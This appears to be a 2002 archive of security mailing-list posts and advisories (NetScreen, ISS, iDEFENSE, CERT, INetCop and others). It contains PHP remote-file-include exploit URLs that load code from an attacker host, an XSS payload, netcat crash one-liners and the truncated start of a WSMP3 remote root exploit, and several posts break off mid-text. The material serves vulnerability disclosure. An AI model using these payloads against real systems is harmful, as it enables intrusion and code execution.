Predictable TCP Initial Sequence Numbers

[NetScreen Security Response Team]

Title: NetScreen Security Alert 51897

Date: 25 November 2002

Description: Predictable TCP Initial Sequence Numbers

Impact: Circumvention of Defined Security Policies

Affected Products: All firewall/VPN appliances and systems

Affected Software Releases: ScreenOS 1.7, 2.6, 2.8, 3.0, 3.1, 4.0

Summary:

A vulnerability has been reported and confirmed in the algorithms generating TCP 
initial sequence numbers that makes their selection predictable. This vulnerability is 
present in ScreenOS 4.0.0 and all prior released versions of ScreenOS.

Predictable TCP ISNs and IP spoofing may be used to gain access to TCP applications or 
services that use IP address based authentication. A considerable amount of 
information regarding this topic can be found at 
http://www.cert.org/advisories/CA-2001-09.html

The vulnerability is exploitable on TCP connections to and from the NetScreen device 
itself. The vulnerability is also exploitable on TCP connections that match policies 
requiring authentication, and on connections forwarded through the device between two 
other hosts during syn-flood protection, when the NetScreen device is performing SYN 
proxying for the protected hosts.

This vulnerability is not exploitable on TCP traffic secured via IPSec, SSH, or other 
mechanisms that make interception and modification of traffic detectable.

The algorithms used to select TCP ISNs in affected versions of ScreenOS 2.6 and 
earlier are most predictable, thus the risks associated with this vulnerability are 
higher for devices running these versions of ScreenOS. Different algorithms with 
significantly less predictability were introduced in ScreenOS 3.0. Algorithms based on 
RFC 1948 were introduced in ScreenOS 4.0.1, and are used in the maintenance releases 
indicated below.

Recommended Actions:

Any or all of

(1) Install one of the maintenance releases indicated below.

(2) Upgrade to ScreenOS 4.0.1.

(3) Only permit protocols that make interception and modification detectable (IPSec, 
SSH, SSL, etc.) to traverse the firewall.

(3) Turn off or readjust syn-flood protection related parameters to minimize exposure 
to the vulnerability.

(4) Follow standard good security practices regarding configuration of the NetScreen 
device and communication to and from it that makes interception and modification 
detectable, if not altogether preventable. Examples include using IPSec tunnels or SSH 
to the device for administrative access to the CLI, MD5 authentication to protect BGP 
sessions, strong authentication for access control, and so on.

Release Schedule:

For a complete release schedule, please visit:  

http://www.netscreen.com/support/alerts/Predictable_TCP_Initial_Sequence_Numbers.html

How to Get ScreenOS:

If you have registered your product with NetScreen and have a valid service contract, 
you can simply download the software from:
http://www.netscreen.com/support/updates.html

You will be prompted for your User ID and Password. Enter the whole or part of your 
company name as your User ID and enter your registered NetScreen device serial number 
as the password.

If you have not yet registered your product with NetScreen, you will need to contact 
NetScreen Technical Support for special instructions on how to obtain the fixed 
software. NetScreen Technical Support is available 24 hours a day, 365 days a year. 
Contact information can be located at 
http://www.netscreen.com/support/technical_assistance.html

Please reference this Advisory title as evidence of your entitlement to the fixed 
software version.

NetScreen authorized Value Added Resellers have access to NetScreen software versions 
and may also be a channel through which to obtain the new release.

Web Server Creator - Web Portal 0.1 (PHP)

[Frog Man]

Informations :
°°
Website : http://webcreator.com02.com
Tested version : 0.1
Problem : Include file

PHP Code/Location :
°°°
news/include/customize.php :
--

$langfile = $l;

include $l;
?>
--

index.php :
---
[...]
if (!$pg) { $pg = "acceuil"; }
[...]
require ("$pg.php");
?>
[...]
---

Exploits :
°°
http://[target]/news/include/customize.php?l=http://[attacker]/file.txt
with
http://[attacker]/file.txt

and

http://[target]/index.php?pg=http://[attacker]/badfile
with
http://[attacker]/badfile.php



Solution :
°°
- Delete bugged lines in news/include/customize.php
- In index.php replce this line :
require ("$pg.php");
by :
---
if (file_exists($pg.".php")){
require ("$pg.php");
}
---

A patch can be found on http://www.phpsecure.org.


More details :
°°
In french :
http://www.frog-man.org/tutos/WSC-WebPortal.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWSC-WebPortal.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII



frog-m@n



_
MSN Search, le moteur de recherche qui pense comme vous ! 
http://search.msn.fr/worldwide.asp

ISS Security Brief: Solaris fs.auto Remote Compromise Vulnerability(fwd)

[Dave Ahmad]

David Mirza Ahmad
Symantec

0x26005712
8D 9A B1 33 82 3D B3 D0 40 EB  AB F0 1E 67 C6 1A 26 00 57 12

-BEGIN PGP SIGNED MESSAGE-

ISS X-Force Security Brief
November 25, 2002

Solaris fs.auto Remote Compromise Vulnerability

Synopsis:

ISS X-Force has discovered a vulnerability in the Sun Microsystems
implementation of the "X Window Font Service", or "XFS". The XFS service was
designed as a component of the X Windows systems to establish a common
mechanism to export font data to all computers on an X Windows network. A
buffer overflow vulnerability exists within the XFS service (fs.auto).

Impact:

Remote attackers can exploit the buffer overflow vulnerability to run
arbitrary commands on a target system. Attackers must exploit this
vulnerability in conjunction with another attack to gain "root" access,
because the fs.auto service does not run with superuser privilege. The Solaris
operating system is configured to run the fs.auto service by default. It is
bound to a high TCP port, which is normally blocked on perimeter firewalls.
Networks that are not filtering high TCP ports, and internal networks are
potentially at risk.

Affected Versions:

Sun Microsystems Solaris 2.5.1 (Sparc/Intel)
Sun Microsystems Solaris 2.6 (Sparc/Intel)
Sun Microsystems Solaris 7 (Sparc/Intel)
Sun Microsystems Solaris 8 (Sparc/Intel)
Sun Microsystems Solaris 9 (Sparc)
Sun Microsystems Solaris 9 Update 2 (Intel)

For the complete ISS X-Force Security Alert, please visit:

http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21541

__

About Internet Security Systems (ISS) Founded in 1994, Internet Security
Systems (ISS) (Nasdaq: ISSX) is a pioneer and world leader in software
and services that protect critical online resources from an ever-
changing spectrum of threats and misuse. Internet Security Systems is
headquartered in Atlanta, GA, with additional operations throughout the
Americas, Asia, Australia, Europe and the Middle East.

Copyright (c) 2002 Internet Security Systems, Inc. All rights reserved
worldwide.

Permission is hereby granted for the electronic redistribution of this
document. It is not to be edited or altered in any way without the
express written consent of the Internet Security Systems X-Force. If you
wish to reprint the whole or any part of this document in any other
medium excluding electronic media, please email [EMAIL PROTECTED] for
permission.

Disclaimer: The information within this paper may change without notice.
Use of this information constitutes acceptance for use in an AS IS
condition. There are NO warranties, implied or otherwise, with regard to
this information or its use. Any use of this information is at the
user's risk. In no event shall the author/distributor (Internet Security
Systems X-Force) be held liable for any damages whatsoever arising out
of or in connection with the use or spread of this information.

X-Force PGP Key available on MIT's PGP key server and PGP.com's key
server, as well as at http://www.iss.net/security_center/sensitive.php

Please send suggestions, updates, and comments to: X-Force
[EMAIL PROTECTED] of Internet Security Systems, Inc.

-BEGIN PGP SIGNATURE-
Version: 2.6.2

iQCVAwUBPeJVADRfJiV99eG9AQFaagP9GJlMjVgMCpm6ycjB8dF6hMfvdqI4DJDf
bTAe+chCGVIcqc1iD5xcdj/kCc8bjOLM+SW7W4LUpIszg0WxExpXMKTd64yflsdF
VZKgNAxkOor2o9XT1mwneZC1/E+KDwV+1x+b0jrAEh5dbWFefKdfe2JEh2xsf/Mh
OxXDC7TBvkk=
=7mVn
-END PGP SIGNATURE-

Multiple phpNuke Modules Vulnerable to Cross-Site Scripting

[Matthew Murphy]

phpNuke Module Vulnerabilities Enable Identity Theft

Systems Affected: phpNuke 6.5b1 and prior (all operating systems)
Risk: High
Impact: Identity Theft/Impersonation/Privilege Elevation
Scenario: Cross-site scripting flaws enabling cookie theft

Description

phpNuke is a popular, and very complex content manager that runs on Unix,
Mac, and Windows systems with a MySQL or similar backend database.  Many of
the content manager's modules contain serious vulnerabilities that allow
attackers to hijack or disable user accounts, and possibly gain
administrative privileges.  Gaining such privileges could likely assist
further compromise of the susceptible system.

I. Search Module Vulnerability

The search module of phpNuke applies absolutely no filtering at all when
returning the "Results for x..." page, and as a result is susceptible to
cross-site scripting via a simple query such as:

acFTP Authentication Issue

[Matthew Murphy]

acFTP is an open-source FTP daemon for Windows platforms
(http://www.sourceforge.net/projects/acftp) that offers more functionality
than many proprietary servers (including the MS FTP service).  The
authentication code of acFTP contains a flaw -- specifically, the server
treats users as logged in without a valid password.  This results in
mis-representation of server activity in log files, and possibly privilege
elevation.

For example:

USER private
PASS #

This leads it to reject my password, but I can not log in with another set
of credentials, and my log activity appears as "private" instead of the
appropriate "-" or "***".

acFreeProxy Cross-Site Scripting Vulnerability/Possible DoS

[Matthew Murphy]

Product Information

acFreeProxy (aka "acfp") is an HTTP/1.x proxy for Microsoft Windows
environments.  It offers caching, and several other features, and has a
plug-in format designed for extensibility.  A flaw in the product may allow
attackers to execute content across domains.

Description

The proxy server may generate an error message if given a host that it
cannot reach, or some other exceptional condition.  The error page generated
during this process does not have any input validation, and is vulnerable to
cross-site scripting.  This allows an attacker to inject code as *any site*
the victim can visit, because this problem is in the proxy, and not a
specific site.

Impact

This vulnerability is significantly more dangerous than any site-specific
flaw, as it can be exploited to read content from any domain, instead of the
limited scope of a typical cross-site scripting flaw, where the site that is
flawed is the only site that can be impacted.

Exploit

http://www.hotmail.com:41997/%3CSCRIPT%3Ealert%28document%3EURL%29%3C/SCRIPT
%3E/

If a vulnerable proxy is being run, script execution begins.

I've also found bizarre crash behavior within acfp.  When it accesses
www.hotmail.com it crashes for some reason that I have yet to isolate.  I
believe that this may have something to do with empty entities in responses.
Any ideas?

[LSD] Java and JVM security vulnerabilities

[Last Stage of Delirium]

We would like to inform you about several security vulnerabilities in Java
Virtual Machine implementations that we have found during our research. These
vulnerabilities affect at least JVMs used in Netscape Communicator and Microsoft
Internet Explorer web browsers. Below you can find their brief descriptions:

[1] - JIT bug
  (it affects Netscape Communicator 4.0-4.8 on Win32/x86 platform)

  Its successfull exploitation allows for complete circumvention of the
  Java type safety rules. In a result of this, applet sandbox restrictions
  can be also escaped and malicious actions can be taken on the computer
  of the victim user.

[2] - Bytecode Verifier vulnerability
 (it affects Microsoft Internet Explorer 4.0-6.0 including VM build 3805)

  Its successfull exploitation allows for complete circumvention of the
  Java type safety rules. In a result of this, applet sandbox restrictions
  can be also escaped and malicious actions can be taken on the computer
  of the victim user.

[3] - Bytecode Verifier vulnerability
  (it affects SUN JDK 1.1-1.4, Netscape Communicator 4.0-4.8 on Win32
  and Unix systems)

  Its successfull exploitation allows to gain read and write access to
  local file system. It also allows to bypass applet sandbox restrictions
  with regard to network access (socket, bind, listen, accept and connect
  calls). On Win32 platform, this vulnerability can be exploited in such
  a way so that complete circumvention of the Java type safety rules can
  be done. In a result of this, applet sandbox restrictions can be also
  escaped and malicious actions can be taken on the computer of the victim
  user.

  Although this vulnerability also affects JDK 1.x from SUN, we haven't
  found a way to successfully exploit it under Netscape 6.x and
  Appletviewer.

[4] - Bad implementation of system classes
  (it affects Netscape Communicator 4.0-4.8 on Win32 and Unix systems)

  It allows for arbitrary loads of user provided libraries. When combined
  with the previous Bytecode Verifier vulnerability it can be used to
  deploy and execute arbitrary programs on the computer of the victim user.

More details with regard to each of the above vulnerabilities can be found in
our technical paper that can be downloaded from our website:

http://lsd-pl.net/java_security.html

This paper was published for the first time on October 3rd 2002. It was
presented during our talk at Asia Black Hat Briefings conference in Singapore.

Along with the paper, we also plan to release proof of concept codes for all
of the vulnerabilites that are discussed in it. But this will be done in about
1 week time from now.

On September 2nd we notified JVM vendors (SUN, Microsoft and Netscape) about
the vulnerabilities that we have found. Along with that we provided them with
a pre-release copy of our paper. Up to this time we have not received ANY
response from Microsoft as well as Netscape with regard to the reported issues
(vendors were given 30 days time to prepare patches). Only SUN replied to our
notification and informed us that proper patches would be prepared for these
issues.

We can understand why there was no response from Netscape since the three [1]
[3][4] vulnerabilities affecting Netscape web browser were submitted to the
Netscape Bug Bounty program which entitles 1000 USD for a security bug in
Netscape Communicator to its founder. Netscape seems to be another American
company that does not seem to be fulfilling public obligations made through
company's web pages (http://home.netscape.com/security/bugbounty.html). While
we were waiting for Netscape's reponse to our vulnerability report, Netscape
changed(!) Reward Guidelines of the Bug Bounty program so that now only bugs
in Netscape 7.x are rewarded (previously both latest 6.x and 4.8 versions were
taken into account). Nice move, huh ?

Netscape cannot of course beat Argus Systems who after 18 months still has not
paid us the remaining 45000 USD of the prize money won by us during the 5th
Argus Hacking Challenge (please see http://lsd-pl.net/argus.html for more
information on this subject).

Best Regards,
Members of LSD Research Group
http://lsd-pl.net

iDEFENSE Security Advisory 11.19.02b: Eudora Script Execution Vulnerability

[David Endler]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

iDEFENSE Security Advisory 11.19.02b:
http://www.idefense.com/advisory/11.19.02b.txt
Eudora Script Execution Vulnerability
November 19, 2002

I. BACKGROUND

Qualcomm Inc.'s Eudora is a graphical e-mail client for Windows and
Macintosh. More information about it is available at
http://www.eudora.com .

II. DESCRIPTION

Remote exploitation of a weakness in Eudora could allow for the
potential retrieval of sensitive information from a targeted Eudora
user's computer.

Eudora saves e-mail attachments in a predictable location. 
Exploitation works as such: an attacker sends an e-mail to a Eudora
user that directs him to a specific URL; the e-mail also contains an
HTML-enabled e-mail attachment that contains scripting code. If the
user is socially engineered into clicking on the link, then a frames
page can load the attachment in one of its frames. The attachment can
then retrieve (within the security settings of the local zone) the
content of any local file, and transmit it back to the attacker. The
attack script, in turn, can retrieve the contents of any local file
and transmit it back to the attacker. Since the issue is simple to
exploit, and the issue has still not been addressed, a sample attack
script is not included in this advisory.

III. ANALYSIS

Exploitation could lead to further compromise if the attacker is able
to retrieve sensitive files such as the Windows SAM table. It is also
possible for the attacker to obtain other confidential information. 
A secure implementation would involve using a random string within
the directory structure to prevent this class of attacks (e.g.
Mozilla e-mail client, etc.).

IV. DETECTION

Eudora 5.1.1 and 5.2 are confirmed to be vulnerable; other versions
may be affected as well.

To determine susceptibility, send an e-mail with an attachment to a
test Eudora user. Check if Eudora stores it in the C:\Program
Files\Qualcomm\Eudora\attach\ directory (assuming a default
installation). 

V. WORKAROUND

Change the default location where Eudora stores e-mail attachments.

VI. VENDOR RESPONSE

A Eudora Tech Support Specialist provided the following response
(from head Eudora developer):

"In rare circumstances, certain ill-formatted MIME boundaries can
cause Eudora to crash. It is exceedingly unlikely that this problem
could be exploited to undermine security. The problem will be fixed
in the next release of Eudora."

[iDEFENSE note: The response does not address the security
implications of this advisory. Two attempts were made to change or
clarify Qualcomm's response; all to no avail.]

VII. CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
assigned the identification number CAN-2002-1210 to this issue.

VIII. DISCLOSURE TIMELINE

09/12/2002  Issue disclosed to iDEFENSE
10/14/2002  Qualcomm notified ([EMAIL PROTECTED])
10/14/2002  iDEFENSE clients notified
10/15/2002  Autoresponse recieved
10/31/2002  Second attempt at contact 
11/07/2002  Third attempt at contact
11/08/2002  Vendor response from J. Michael L. ([EMAIL PROTECTED])
11/10/2002  Clarification request of Vendor Response from iDEFENSE
11/11/2002  Same response from J. Michael L. ([EMAIL PROTECTED])
11/12/2002  Second clarification request of Vendor Response from
iDEFENSE
11/19/2002  Still no reply for vendor clarification of response
11/19/2002  Public disclosure

IX. CREDIT

Bennett Haselton ([EMAIL PROTECTED]) discovered this
vulnerability.



Get paid for security research
http://www.idefense.com/contributor.html

Subscribe to iDEFENSE Advisories:
send email to [EMAIL PROTECTED], subject line: "subscribe"


About iDEFENSE:

iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world — from technical
vulnerabilities and hacker profiling to the global spread of viruses
and other malicious code. Our security intelligence services provide 
decision-makers, frontline security professionals and network 
administrators with timely access to actionable intelligence
and decision support on cyber-related threats. For more information,
visit http://www.idefense.com.


- -dave

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071

[EMAIL PROTECTED]
www.idefense.com

-BEGIN PGP SIGNATURE-
Version: PGP 7.1.2
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A

iQA/AwUBPdrDkkrdNYRLCswqEQJc7QCfSGedu5O28cnm78OE1J1y9LBRwmsAoImw
bNiGiW0ruhVfLb/5Ek3s8tIg
=/ojw
-END PGP SIGNATURE-

Re: Alert: Microsoft Security Bulletin - MS02-066

[Lise]

Hi,

In MS02-066 Microsoft claim they've fixed several Cross Domain
Verification problems. Unfortunately, they are not really clear on
which vulnerabilities they fix. 

Does anyone know which vulnerability was meant with this:
- Frames Cross Site Scripting: CVE-CAN-2002-1187

The CVE number is reserved and doesn't provide much info, at this moment
:-/

Any references to BT/NTBT postings would by greatly appreciated.

Kind regards,

Lise

Remote Heap malloc/free & multiple Overflow vulnerability in WSMP3.

[dong-h0un U]

INetCop Security Advisory #2002-0x82-006



* Title: Remote Heap malloc/free & multiple Overflow vulnerability in WSMP3.


0x01. Description
=-=-=-=-=-=-=-=-=

WSMP3d webserver or, is used by shoutcast-server.
This supports to hear mp3, is daemon that have webserver's function.

If examine 'src/web_server.c', can know that very many multiple overflows exist.
Among various kinds, explain representative 2 things.

main() function:
  __
  1360  int main(int argc, char *argv[],char *envp[])
...
  1363char recvBuffer[BUFSIZE]; // 32768
...
  1526i=recv(sock,recvBuffer,BUFSIZE,0);
...
  1592conn_req=parse_request(recvBuffer); // parse_request();
  --

parse_request() function:
   __
   560  req_descriptor* parse_request(char *req)
...
   563char reqcpy[1024]; // 1024 ??
...
   572strcpy(reqcpy,req); // Overflow of stack base gets up.
   573ritorno->action=get_op(reqcpy); // get_op();
...
   575strcpy(reqcpy,req);
:
:
   --

Stack overflow happens because use strcpy(). (arrangement 1024)
Next, let's see heap malloc()/free() bug.

get_op() function:
   --
   671  char* get_op(char *buf)
...
   673char* op;
   674int i;
   675if((op=(char *)malloc(10))==NULL)
...
   684while(buf[i]!=' ')
   685  {
   686op[i]=buf[i]; // This part is very dangerous.
   687i++;
   688  }
   689op[i]='\0';
...
   692return op;
   --

That don't examine 0x20(' ') impatiently store.
See that is declared by malloc(10).

Now, they are going to achieve by next structure. (anticipation)


get_op() -return(op)-> parse_request()
parse_request() -return(ritorno)-> conn_req
rem_req_descriptor(conn_req);


rem_req_descriptor() function:
   __
   504  void rem_req_descriptor(req_descriptor *desc)
   505  {
   506free(desc->action);
   507free(desc->what);
   508free(desc->host);
   509free(desc->agent);
   510free(desc->accept);
   511free(desc->lang);
   512free(desc->enc);
   513free(desc->charset);
   514free(desc->keep);
   515free(desc->conn);
   516free(desc->referer);
   517free(desc->pragma);
   518free(desc->contType);
   519free(desc->contLength);
   520free(desc->content);
   521
   522free(desc);
   --

They look like very interesting. So?


0x02. Vulnerable Packages
=-=-=-=-=-=-=-=-=-=-=-=-=

Vendor site: http://wsmp3.sourceforge.net/

{I sent mail to vendor. It may be newest correction version. (anticipation)}

web_server-0.0.6
-web_server-0.0.6.tar.gz
+RedHat Linux 6.x
web_server-0.0.5 (exploitable)
-web_server-0.0.5.tar.gz
web_server-0.0.4
-web_server-0.0.4.tar.gz
web_server-0.0.3
-web_server-0.0.3.tar.gz.gz
wsmp3-0.0.2
-web_server-0.0.2.tar.gz
web_server-v.0.0.1
-web_server.tar.gz

* I did not other version exploit test. but, It may be weak.


0x03. Exploit
=-=-=-=-=-=-=

It's simple test.

* Test -

First, execute wsmp3 server.
Do debug in other shell thereafter.

First, stack overflow test.

#1) Test attacker:

bash$ (echo "GET `perl -e 'print \"x\"x2000'`";cat)|nc 0 8000

#2) Debugging:

Program received signal SIGSEGV, Segmentation fault.
0x804a533 in parse_request ()
(gdb) where
#0  0x804a533 in parse_request ()
#1  0x78787878 in ?? ()
Cannot access memory at address 0x78787878.
(gdb)

Next, heap malloc()/free() overflow test.

#1) Test attacker:

bash$ (echo "x82-x0x-test";cat)|nc 0 8000

#2) Debugging:

Program received signal SIGSEGV, Segmentation fault.
0x4006fea4 in chunk_free (ar_ptr=0x40104040, p=0x805a720) at malloc.c:3036
3036malloc.c: No such file or directory.
(gdb) where
#0  0x4006fea4 in chunk_free (ar_ptr=0x40104040, p=0x805a720) at malloc.c:3036
#1  0x4006fd75 in __libc_free (mem=0x805a728) at malloc.c:2959
#2  0x804a322 in rem_req_descriptor ()
#3  0x804f138 in main ()
#4  0x4002f1eb in __libc_start_main (main=0x804d3b4 , argc=1,
argv=0xbc04, init=0x8048b74 <_init>, fini=0x804f42c <_fini>,
rtld_fini=0x4000a610 <_dl_fini>, stack_end=0xbbfc)
at ../sysdeps/generic/libc-start.c:90
(gdb)

Because of multiplex overflow, exploit is difficult.
Very angry. :-(

This's exploit code that prove.
This code attacks heap malloc()/free() only.
Through remote attack, get 'root' competence !


=== 0x82-Remote.wsmp3xpl.c ===

/*
**
** Proof of Concept WSMP3 Remote root exploit
**   by Xpl017Elz
** __
** Testing exploit:
**
** bash$ ./0x82-Remote.wsmp3xpl -h localhost -p 8000
**
**  Proof of Concept WSMP3 Remote root exploit
**by Xpl017Elz
**
**  Try `./0x82-Remote.wsmp3xpl -?' for more information.
**
**  [1] Make fake chunk.
**  [2] Make shellcode.
**  [3] Send explo

CERT Advisory CA-2002-32 Backdoor in Alcatel OmniSwitch AOS (fwd)

[Dave Ahmad]

David Mirza Ahmad
Symantec

0x26005712
8D 9A B1 33 82 3D B3 D0 40 EB  AB F0 1E 67 C6 1A 26 00 57 12

-- Forwarded message --
Return-Path: <[EMAIL PROTECTED]>
Delivered-To: [EMAIL PROTECTED]
Received: (qmail 24024 invoked by alias); 21 Nov 2002 18:36:26 -
Delivered-To: [EMAIL PROTECTED]
Received: (qmail 24019 invoked from network); 21 Nov 2002 18:36:26 -
Received: from unknown (HELO canaveral.indigo.cert.org) (192.88.209.169)
  by mail.securityfocus.com with SMTP; 21 Nov 2002 18:36:26 -
Received: from localhost (lnchuser@localhost)
by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id
gALFjiM10306;
Thu, 21 Nov 2002 10:45:44 -0500
Date: Thu, 21 Nov 2002 10:45:44 -0500
Message-Id: <[EMAIL PROTECTED]>
From: CERT Advisory <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Organization: CERT(R) Coordination Center - +1 412-268-7090
List-Help: , 
List-Subscribe: 
List-Unsubscribe:

List-Post: NO (posting not allowed on this list)
List-Owner: 
List-Archive: 
Subject: CERT Advisory CA-2002-32 Backdoor in Alcatel OmniSwitch AOS
Precedence: bulk



-BEGIN PGP SIGNED MESSAGE-

CERT Advisory CA-2002-32 Backdoor in Alcatel OmniSwitch AOS

   Original release date: November 21, 2002
   Last revised: --
   Source: CERT/CC, Alcatel

   A complete revision history can be found at the end of this file.

Systems Affected

 * Alcatel  OmniSwitch  7700/7800  switches running Alcatel Operating
   System (AOS) version 5.1.1

Overview

   Alcatel has recently discovered a serious vulnerability in AOS version
   5.1.1.   Exploitation   of   this   vulnerability  can  lead  to  full
   administrative control of the device running AOS.

I. Description

   AOS  typically  runs  on  network  infrastructure devices, such as the
   Alcatel OmniSwitch 7000 series switch. According to Alcatel:

 During an NMAP audit of the AOS 5.1.1 code that runs on the Alcatel
 OmniSwitch  7700/7800  LAN  switches,  it  was  determined a telnet
 server  was listening on TCP port number 6778. This was used during
 development to access the Wind River Vx-Works operating system. Due
 to  an  oversight,  this  access  was  not removed prior to product
 release.

   Further   information   about  this  vulnerability  may  be  found  in
   VU#181721. This issue is also being referenced as CAN-2002-1272:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1272

II. Impact

   An  attacker  can  gain  full access to any device running AOS version
   5.1.1,  which  can  result  in,  but  is  not limited to, unauthorized
   access,  unauthorized  monitoring,  information  leakage, or denial of
   service.

III. Solution

Upgrade to AOS 5.1.1.R02 or AOS 5.1.1.R03

   Contact Alcatel's customer support for the updated AOS.

Workarounds

   Block access to port 6778/TCP at your network perimeter.

Appendix A. - Vendor Information

   VU#181721  was  written  by  Alcatel.  As  new  vendor  information is
   reported to the CERT/CC, we will update VU#181721 and note the changes
   in our revision history.

Appendix B. - References

1. VU#181721:   Alcatel  OmniSwitch  7700/7800  does  not  require  a
   password for accessing the telnet server -
   http://www.kb.cert.org/vuls/id/181721

2. OmniSwitch_7000_brief -
   http://www.ind.alcatel.com/nextgen/OmniSwitch_7000_brief.pdf

3. CAN-2002-1272 -
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1272
 _

   We  thank  Olivier  Paridaens  and Jeff Hayes of Alcatel for reporting
   this issue.
 _

   Author: Ian A. Finlay.
   __

   This document is available from:
   http://www.cert.org/advisories/CA-2002-32.html
   __

CERT/CC Contact Information

   Email: [EMAIL PROTECTED]
  Phone: +1 412-268-7090 (24-hour hotline)
  Fax: +1 412-268-6989
  Postal address:
  CERT Coordination Center
  Software Engineering Institute
  Carnegie Mellon University
  Pittsburgh PA 15213-3890
  U.S.A.

   CERT/CC   personnel   answer  the  hotline  08:00-17:00  EST(GMT-5)  /
   EDT(GMT-4)  Monday  through  Friday;  they are on call for emergencies
   during other hours, on U.S. holidays, and on weekends.

Using encryption

   We  strongly  urge you to encrypt sensitive information sent by email.
   Our public PGP key is available from
   http://www.cert.org/CERT_PGP.key

   If  you  prefer  to  use  DES,  please  call the CERT hotline for more
   information